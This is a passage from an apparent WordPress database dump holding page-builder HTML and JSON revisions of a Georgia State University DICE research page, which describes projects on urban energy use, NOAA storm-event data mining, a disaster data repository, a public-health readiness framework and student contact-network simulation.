gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:37:07','2023-09-29 14:37:07','',126,'https://gsudice.dataconn.net/?p=1469',0,'revision','',0),(1475,1,'2023-09-29 10:38:17','2023-09-29 14:38:17','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg','cropped-cropped-tornado.jpg','','inherit','open','closed','','cropped-cropped-tornado-jpg','','','2023-09-29 10:38:17','2023-09-29 14:38:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-tornado.jpg',0,'attachment','image/jpeg',0),(1476,1,'2023-09-29 10:38:20','2023-09-29 14:38:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:38:20','2023-09-29 14:38:20','',438,'https://gsudice.dataconn.net/?p=1476',0,'revision','',0),(1477,1,'2023-09-29 10:38:20','2023-09-29 14:38:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural 